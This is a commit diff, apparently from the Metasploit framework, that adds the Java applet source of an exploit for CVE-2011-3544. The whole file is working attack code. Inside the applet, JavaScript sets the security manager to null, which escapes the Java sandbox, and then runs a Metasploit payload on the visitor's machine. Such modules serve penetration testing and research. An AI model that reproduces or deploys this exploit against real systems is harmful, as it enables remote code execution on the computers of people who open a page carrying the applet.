Add source for CVE-2011-3544
This commit is contained in:
parent
807f220689
commit
9e71be8ed0
|
@ -0,0 +1,38 @@
|
|||
import java.applet.Applet;
|
||||
import javax.script.*;
|
||||
import javax.swing.JList;
|
||||
|
||||
import metasploit.Payload;
|
||||
|
||||
public class Exploit extends Applet {
|
||||
public void init() {
|
||||
try {
|
||||
ScriptEngine se = new ScriptEngineManager().getEngineByName("js");
|
||||
Bindings b = se.createBindings();
|
||||
b.put("applet", this);
|
||||
Object proxy = (Object) se.eval(
|
||||
"this.toString = function() {" +
|
||||
" java.lang.System.setSecurityManager(null);" +
|
||||
" applet.callBack();" +
|
||||
" return 'metasploit';" +
|
||||
"};" +
|
||||
"c = new Error();" +
|
||||
"c.message = this;" +
|
||||
"c", b);
|
||||
JList list = new JList(new Object[] { proxy });
|
||||
this.add(list);
|
||||
} catch (ScriptException ex) {
|
||||
ex.printStackTrace();
|
||||
}
|
||||
}
|
||||
|
||||
public void callBack() {
|
||||
try {
|
||||
Payload.main(null);
|
||||
} catch(Exception e) {
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
Loading…
Reference in New Issue